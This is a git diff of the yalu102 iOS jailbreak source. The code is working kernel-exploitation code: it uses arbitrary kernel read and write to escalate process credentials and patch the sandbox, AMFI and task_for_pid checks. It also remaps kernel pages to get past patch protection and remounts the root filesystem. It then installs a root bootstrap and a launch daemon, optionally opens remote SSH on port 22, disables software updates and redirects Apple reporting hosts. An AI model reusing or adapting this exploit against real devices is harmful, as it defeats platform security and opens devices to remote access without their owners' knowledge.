b/yalu102/include/.gitignore new file mode 100644 index 0000000..fc59920 --- /dev/null +++ b/yalu102/include/.gitignore @@ -0,0 +1,2 @@ +IOKit +libkern diff --git a/yalu102/include/README.md b/yalu102/include/README.md new file mode 100644 index 0000000..8eaf44f --- /dev/null +++ b/yalu102/include/README.md @@ -0,0 +1,3 @@ +IOKit's `Headers` directory from the macOS SDK is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. + +The Xcode project will automatically create all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h new file mode 100644 index 0000000..735df7f --- /dev/null +++ b/yalu102/jailbreak.h @@ -0,0 +1,15 @@ + +#pragma once + +#import +#import +#import + +extern mach_port_t tfp0; +extern uint64_t kernbase; +extern uint64_t slide; +extern uint64_t allprocs_offset; +extern uint64_t rootvnode_offset; +extern bool cfg_enable_remote_ssh; + +void jailbreak(void); diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 96d6368..aa04351 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -6,44 +6,31 @@ // Copyright © 2017 kimjongcracks. All rights reserved. // +#import "jailbreak.h" #import -#undef __IPHONE_OS_VERSION_MIN_REQUIRED -#import -#import "devicesupport.h" - #import #import -#import -#import #import -#import - -#import "devicesupport.h" -#import #import #import -#import +#import #import #import #import - +#import +#import +#import +#import "mac_policy.h" #import "patchfinder64.h" +#import "csflags.h" +#import "mach_vm.h" -#define vm_address_t mach_vm_address_t - -mach_port_t tfp0=0; -uint64_t slide=0; -io_connect_t funcconn=0; -// #define NSLog(...) -kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); -kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); -kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); -kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); - -uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2) -{ - return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr); -} +uint64_t slide; +mach_port_t tfp0; +uint64_t kernbase; +uint64_t allprocs_offset; +uint64_t rootvnode_offset; +bool cfg_enable_remote_ssh; void copyin(void* to, uint64_t from, size_t size) { mach_vm_size_t outsize = size; @@ -63,7 +50,6 @@ void copyin(void* to, uint64_t from, size_t size) { if (size > 0x1000) { size = 0x1000; } - } } @@ -95,21 +81,18 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { #import "pte_stuff.h" -void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) -{ - io_iterator_t iterator; - IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); - io_object_t servicex = IOIteratorNext(iterator); - funcconn = 0; - IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); - assert(funcconn); - - tfp0 = pt; - +void jailbreak(void) { + NSLog(@"jailbreaking using:"); + NSLog(@"tfp0 = %x", tfp0); + NSLog(@"kernbase = %llx", kernbase); + NSLog(@"slide = %llx", slide); + NSLog(@"allprocs_offset = %llx", allprocs_offset); + NSLog(@"rootvnode_offset = %llx", rootvnode_offset); + uint64_t bsd_task=0; uint64_t launchd_task = 0; { - uint64_t proc = ReadAnywhere64(allprocs+kernbase); + uint64_t proc = ReadAnywhere64(allprocs_offset+kernbase); NSLog(@"found procs at %llx", proc); while (proc) { uint32_t pid = ReadAnywhere32(proc+0x10); @@ -147,42 +130,43 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere64(bsd_task+0x100, credpatch); checkvad(); - - vm_address_t vmd = 0; + + mach_vm_offset_t vmd = 0; _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE); copyin((void*)vmd, kernbase, 0x4000); - struct mach_header_64* vmk = vmd; + struct mach_header_64* vmk = (struct mach_header_64*)vmd; uint64_t max = 0; uint64_t min = -1; - struct load_command* lc = vmk+1; + struct load_command* lc = (struct load_command*)(vmk + 1); for (int k=0; k < vmk->ncmds; k++) { - if (lc->cmd == LC_SEGMENT_64) { - struct segment_command_64* sg = lc; + struct segment_command_64* sg = (struct segment_command_64*)lc; NSLog(@"seg: %s", sg->segname); if (sg->vmaddr < min) { min = sg->vmaddr; } if (sg->vmaddr + sg->vmsize > max) { - max = sg->vmaddr+sg->vmsize; + max = sg->vmaddr + sg->vmsize; } } - lc = ((char*)lc) + lc->cmdsize; + lc = (struct load_command*)(((char*)lc) + lc->cmdsize); } + + size_t kernsize = (size_t)(max - min); - NSLog(@"%llx - %llx", min, max); - - char* kdump = malloc(max-min); + NSLog(@"%llx - %llx = %zx", min, max, kernsize); - for (int k=0; k < (max-min)/0x4000; k++) { + char* kdump = malloc(kernsize); + + for (int k=0; k < kernsize/0x4000; k++) { copyin(kdump+k*0x4000, min+k*0x4000, 0x4000); } - NSLog(@"%llx", kdump); + NSLog(@"%zx", (uintptr_t)kdump); uint64_t kerndumpsize = 0; uint64_t gadget_base = 0; uint64_t gadget_size = 0; @@ -215,12 +199,13 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) kerndumpbase = seg->vmaddr; } kerndumpsize += seg->vmsize; - } else if (load_cmd->cmd == LC_UNIXTHREAD) { + } + else if (load_cmd->cmd == LC_UNIXTHREAD) { struct { - unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ - unsigned long cmdsize; /* total size of this command */ + unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ + unsigned long cmdsize; /* total size of this command */ unsigned long flavor; /* flavor of thread state */ - unsigned long count; /* count of longs in thread state */ + unsigned long count; /* count of longs in thread state */ struct { __uint64_t __x[29]; /* General purpose registers x0-x28 */ __uint64_t __fp; /* Frame pointer x29 */ @@ -230,7 +215,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) __uint32_t __cpsr; /* Current program status register */ __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */ } state; - } * thr = load_cmd; + } * thr = (void*)load_cmd; entryp = thr->state.__pc; } @@ -248,9 +233,15 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) entryp += slide; uint64_t rvbar = entryp & (~0xFFF); - uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1); + uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), + rvbar - gadget_base + 0x40, + text_exec_base, + 1); - uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20); + uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), + rvbar - gadget_base + 0x50, + text_exec_base, + 20); if (uref) { optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase; } @@ -262,10 +253,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t pmap_store = find_kernel_pmap(); NSLog(@"pmap: %llx", pmap_store); level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); - - - - + uint64_t shellcode = physalloc(0x4000); /* @@ -456,7 +444,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) */ int cpacr_idx = 0; - uint32_t* opps = gadget_base - min + kdump; + uint32_t* opps = (uint32_t*)(gadget_base - min + kdump); while (1) { if (opps[cpacr_idx] == 0xd5181040) { @@ -552,8 +540,8 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { uint64_t endf = prelink_base+prelink_size; uint64_t ends = whole_size - (endf - whole_base); - uint32_t* opps_stream = whole_dump + endf - whole_base; - uint64_t* ptr_stream = whole_dump + endf - whole_base; + uint32_t* opps_stream = (uint32_t*)(whole_dump + endf - whole_base); + uint64_t* ptr_stream = (uint64_t*)(whole_dump + endf - whole_base); uint64_t lastk = 0; int streak = 0; @@ -579,15 +567,12 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) } } - if (streak == 9) { - - - char* sbstr = whole_dump + lastk + endf - whole_base - 8; + uint8_t* sbstr = whole_dump + lastk + endf - whole_base - 8; uint64_t extract_attr_recipe = *(uint64_t*)(sbstr + 72 * 0x20 + 8 /*fptr*/); - uint32_t* opcode_stream = extract_attr_recipe - whole_base + whole_dump; + uint32_t* opcode_stream = (uint32_t*)(extract_attr_recipe - whole_base + whole_dump); int l = 0; while (1) { @@ -627,7 +612,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t tfp = *(uint64_t*)(sbstr + 45 * 0x20 + 8 /*fptr*/); - opcode_stream = tfp - whole_base + whole_dump; + opcode_stream = (uint32_t*)(tfp - whole_base + whole_dump); int cbz = 0; while (1) { @@ -640,13 +625,14 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) RemapPage(tfp + cbz*4); WriteAnywhere32(NewPointer(tfp+cbz*4), 0xd503201f); } - } - /* - nonceenabler - */ - + + { + /* + nonceenabler + */ + uint64_t endf = prelink_base+prelink_size; uint64_t ends = whole_size - (endf - whole_base); char* sbstr = memmem(whole_dump + endf - whole_base, ends, "com.apple.System.boot-nonce", strlen("com.apple.System.boot-nonce")); @@ -664,7 +650,6 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) } - uint64_t memcmp_got = find_amfi_memcmpstub(); uint64_t ret1 = find_ret_0(); @@ -697,7 +682,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); uint64_t nopag = sbops_end - sbops; - + for (int i = 0; i < nopag; i+= PSZ) { RemapPage(((sbops + i) & (~PMK))); } @@ -748,7 +733,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; uint64_t nopag = (sbops_end - sbops)/(PSZ); - + for (int i = 0; i < nopag; i++) { RemapPage(((sbops + i*(PSZ)) & (~PMK))); } @@ -812,7 +797,6 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { // mount patch - extern uint64_t rootvnode_offset; uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase); struct utsname uts; @@ -839,97 +823,116 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) } { - char path[256]; - uint32_t size = sizeof(path); - _NSGetExecutablePath(path, &size); - char* pt = realpath(path, 0); - - { - __block pid_t pd = 0; - NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent]; - + /* + persistent filesystem modifications + */ + + NSBundle *resBundle = [NSBundle mainBundle]; + pid_t tmp_pid; + const char** tmp_args; + + int installedFd = open("/.installed_yaluX", O_RDONLY); + + // extract root file system patches + if (installedFd == -1) { + NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil]; + unlink("/bin/tar"); + copyfile([tarPath UTF8String], "/bin/tar", 0, COPYFILE_ALL); + chmod("/bin/tar", 0755); + chown("/bin/tar", 0, 0); + + NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; + tmp_args = (const char*[]){ + "/bin/tar", + "--preserve-permissions", + "--no-overwrite-dir", + "-C", "/", + "-xvf", + [bootstrapTarPath UTF8String], + NULL + }; + posix_spawn(&tmp_pid, "/bin/tar", NULL, NULL, (char**)tmp_args, NULL); + waitpid(tmp_pid, 0, 0); - int f = open("/.installed_yaluX", O_RDONLY); + NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; + unlink("/bin/launchctl"); + copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); + chmod("/bin/launchctl", 0755); + chown("/bin/launchctl", 0, 0); - if (f == -1) { - NSString* tar = [execpath stringByAppendingPathComponent:@"tar"]; - NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"]; - const char* jl = [tar UTF8String]; - - unlink("/bin/tar"); - unlink("/bin/launchctl"); - - copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); - chmod("/bin/tar", 0777); - jl="/bin/tar"; // - - chdir("/"); - - posix_spawn(&pd, jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "--no-overwrite-dir", "-xvf", [bootstrap UTF8String], NULL}, NULL); - NSLog(@"pid = %x", pd); - waitpid(pd, 0, 0); - - - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"]; - jl = [jlaunchctl UTF8String]; - - copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL); - chmod("/bin/launchctl", 0755); - - open("/.installed_yaluX", O_RDWR|O_CREAT); - open("/.cydia_no_stash",O_RDWR|O_CREAT); - - - system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); - system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); - - system("/usr/bin/uicache"); - - system("killall -SIGSTOP cfprefsd"); - NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; - - [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; - - [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; - system("killall -9 cfprefsd"); - - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; - char* jl = [jlaunchctl UTF8String]; - unlink("/usr/libexec/reload"); - copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); - chmod("/usr/libexec/reload", 0755); - chown("/usr/libexec/reload", 0, 0); - - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; - char* jl = [jlaunchctl UTF8String]; - unlink("/Library/LaunchDaemons/0.reload.plist"); - copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); - chmod("/Library/LaunchDaemons/0.reload.plist", 0644); - chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"dropbear.plist"]; - char* jl = [jlaunchctl UTF8String]; - unlink("/Library/LaunchDaemons/dropbear.plist"); - copyfile(jl, "/Library/LaunchDaemons/dropbear.plist", 0, COPYFILE_ALL); - chmod("/Library/LaunchDaemons/dropbear.plist", 0644); - chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); + close(open("/.installed_yaluX", O_RDWR|O_CREAT)); + close(open("/.cydia_no_stash", O_RDWR|O_CREAT)); + + int hostsFd = open("/etc/hosts", O_RDWR|O_APPEND); + if (hostsFd != -1) { + const char *s; + s = "127.0.0.1 iphonesubmissions.apple.com\n" + "127.0.0.1 radarsubmissions.apple.com\n"; + write(hostsFd, s, strlen(s)); + close(hostsFd); } - unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); + + system("/usr/bin/uicache"); + system("killall -SIGSTOP cfprefsd"); + NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; + [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; + [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; + system("killall -9 cfprefsd"); + + rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", + "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); + } + else { + close(installedFd); + } + + + // install usermode reload script + { + NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil]; + unlink("/usr/libexec/reload"); + copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, COPYFILE_ALL); + chmod("/usr/libexec/reload", 0755); + chown("/usr/libexec/reload", 0, 0); + + NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil]; + unlink("/Library/LaunchDaemons/0.reload.plist"); + copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); + chmod("/Library/LaunchDaemons/0.reload.plist", 0644); + chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); + } + + // install SSH agent + { + NSString* dropbearPlistPath = [resBundle pathForResource:@"dropbear.plist" ofType:nil]; + unlink("/Library/LaunchDaemons/dropbear.plist"); + copyfile([dropbearPlistPath UTF8String], "/Library/LaunchDaemons/dropbear.plist", 0, COPYFILE_ALL); + chmod("/Library/LaunchDaemons/dropbear.plist", 0644); + chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); + if (cfg_enable_remote_ssh) { + NSLog(@"enabling SSH remote access"); + NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/Library/LaunchDaemons/dropbear.plist"]; + NSMutableArray *a = [NSMutableArray arrayWithArray:[md valueForKey:@"ProgramArguments"]]; + a[4] = @"22"; + [md setValue:a forKey:@"ProgramArguments"]; + [md writeToFile:@"/Library/LaunchDaemons/dropbear.plist" atomically:YES]; + } } } + + /* chmod("/private", 0777); chmod("/private/var", 0777); chmod("/private/var/mobile", 0777); chmod("/private/var/mobile/Library", 0777); chmod("/private/var/mobile/Library/Preferences", 0777); + */ + system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); + system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); + WriteAnywhere64(bsd_task+0x100, orig_cred); sleep(2); diff --git a/yalu102/devicesupport.h b/yalu102/mac_policy.h similarity index 89% rename from yalu102/devicesupport.h rename to yalu102/mac_policy.h index 97bcf09..d5c7ece 100644 --- a/yalu102/devicesupport.h +++ b/yalu102/mac_policy.h @@ -1,41 +1,9 @@ -#ifndef devicesupport_h -#define devicesupport_h +#pragma once - -//0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) - -#define G(type) constget(type) -#define S(type, val) constset(type,val) - -#define CS_VALID 0x0000001 /* dynamically valid */ -#define CS_ADHOC 0x0000002 /* ad hoc signed */ -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ -#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ -#define CS_REQUIRE_LV 0x0002000 /* require library validation */ -#define CS_ENTITLEMENTS_VALIDATED 0x0004000 - -#define CS_ALLOWED_MACHO 0x00ffffe - -#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ -#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ -#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ -#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ - -#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ -#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ -#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ - -uint64_t constget(int idx); #import -struct mac_policy_ops{ + +struct mac_policy_ops { uint64_t mpo_audit_check_postselect; uint64_t mpo_audit_check_preselect; uint64_t mpo_bpfdesc_label_associate; @@ -372,7 +340,3 @@ struct mac_policy_ops{ uint64_t mpo_iokit_check_filter_properties; uint64_t mpo_iokit_check_get_property; }; - - - -#endif /* devicesupport_h */ diff --git a/yalu102/mach_vm.h b/yalu102/mach_vm.h new file mode 100644 index 0000000..14fcd99 --- /dev/null +++ b/yalu102/mach_vm.h @@ -0,0 +1,12 @@ + +#pragma once + +#include + +// evil hackfix: makes vm_address_t 64-bit +#define vm_address_t mach_vm_address_t + +kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); +kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); +kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); +kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); diff --git a/yalu102/offsets.c b/yalu102/offsets.c deleted file mode 100644 index 88c4dd0..0000000 --- a/yalu102/offsets.c +++ /dev/null @@ -1,116 +0,0 @@ -#include -#include -#include -#include - -#include "offsets.h" - -uint64_t allproc_offset; -uint64_t kernproc_offset; -uint64_t procoff; -uint64_t rootvnode_offset; - -void init_offsets() { - struct utsname u = { 0 }; - uname(&u); - - printf("sysname: %s\n", u.sysname); - printf("nodename: %s\n", u.nodename); - printf("release: %s\n", u.release); - printf("version: %s\n", u.version); - printf("machine: %s\n", u.machine); - - allproc_offset = 0x5a4148; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - - /* - Offsets shared by: - - @qwertyoruiop - - @Mila432 - - @Andywiik - - @nicogibbons - - @jtv7 - - @onchehuh - */ - - if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b8528; - rootvnode_offset = 0x5be0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b8468; - rootvnode_offset = 0x5be0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a8438; - rootvnode_offset = 0x5ae0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5ac418; - rootvnode_offset = 0x5b20b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec478; - rootvnode_offset = 0x5f20b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b8468; - rootvnode_offset = 0x5be0b8; - }//apple tv 4 - else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b8468; - rootvnode_offset = 0x5be0b8; - }//apple tv 4 - else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b4168; - rootvnode_offset = 0x5ba0b8; - }//apple tv 4 - else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec178; - rootvnode_offset = 0x5f20b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b4228; - rootvnode_offset = 0x5ba0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b4168; - rootvnode_offset = 0x5ba0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; - rootvnode_offset = 0x5aa0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; - rootvnode_offset = 0x5aa0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec178; - rootvnode_offset = 0x5f20b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b0228; - rootvnode_offset = 0x5b60b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b0168; - rootvnode_offset = 0x5b60b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; - rootvnode_offset = 0x5aa0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; - rootvnode_offset = 0x5aa0b8; - } - else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; - rootvnode_offset = 0x5aa0b8; - }//some beta ios - else { - printf("missing offset, prob crashing\n"); - } -} \ No newline at end of file diff --git a/yalu102/offsets.h b/yalu102/offsets.h deleted file mode 100644 index 4e6e8d3..0000000 --- a/yalu102/offsets.h +++ /dev/null @@ -1,37 +0,0 @@ -#ifndef offsets_h -#define offsets_h - -#import - -// offsets from the main kernel 0xfeedfacf -extern uint64_t allproc_offset; -extern uint64_t kernproc_offset; - -// offsets in struct proc -extern uint64_t struct_proc_p_pid_offset; -extern uint64_t struct_proc_task_offset; -extern uint64_t struct_proc_p_uthlist_offset; -extern uint64_t struct_proc_p_ucred_offset; -extern uint64_t struct_proc_p_comm_offset; - -// offsets in struct kauth_cred -extern uint64_t struct_kauth_cred_cr_ref_offset; - -// offsets in struct uthread -extern uint64_t struct_uthread_uu_ucred_offset; -extern uint64_t struct_uthread_uu_list_offset; - -// offsets in struct task -extern uint64_t struct_task_ref_count_offset; -extern uint64_t struct_task_itk_space_offset; - -// offsets in struct ipc_space -extern uint64_t struct_ipc_space_is_table_offset; - -// offsets in struct ipc_port -extern uint64_t struct_ipc_port_ip_kobject_offset; - -void init_offsets(); -extern uint64_t rootvnode_offset; - -#endif diff --git a/yalu102/patchfinder64.h b/yalu102/patchfinder64.h index a6909af..23edd52 100644 --- a/yalu102/patchfinder64.h +++ b/yalu102/patchfinder64.h @@ -5,30 +5,29 @@ // Copyright © 2016 qwertyoruiop. All rights reserved. // -#ifndef patchfinder64_h -#define patchfinder64_h +#pragma once #import -extern uint64_t text_exec_base; -extern uint64_t text_exec_size; +extern uint64_t text_exec_base; +extern uint64_t text_exec_size; -extern uint64_t prelink_exec_base; -extern uint64_t prelink_exec_size; +extern uint64_t prelink_exec_base; +extern uint64_t prelink_exec_size; extern uint64_t whole_base; extern uint64_t whole_size; extern uint8_t* whole_dump; extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); + enum Search { SearchTextExec, SearchPrelinkExec }; -extern char uref; -extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); - +extern char uref; +uint64_t get_data_for_mode(uint64_t offset, enum Search mode); void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); @@ -48,28 +47,3 @@ uint64_t find_ret_non0(); uint64_t find_ret_0(); uint64_t find_amfiret(); uint64_t find_sbops(); -#define CS_VALID 0x0000001 /* dynamically valid */ -#define CS_ADHOC 0x0000002 /* ad hoc signed */ -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define 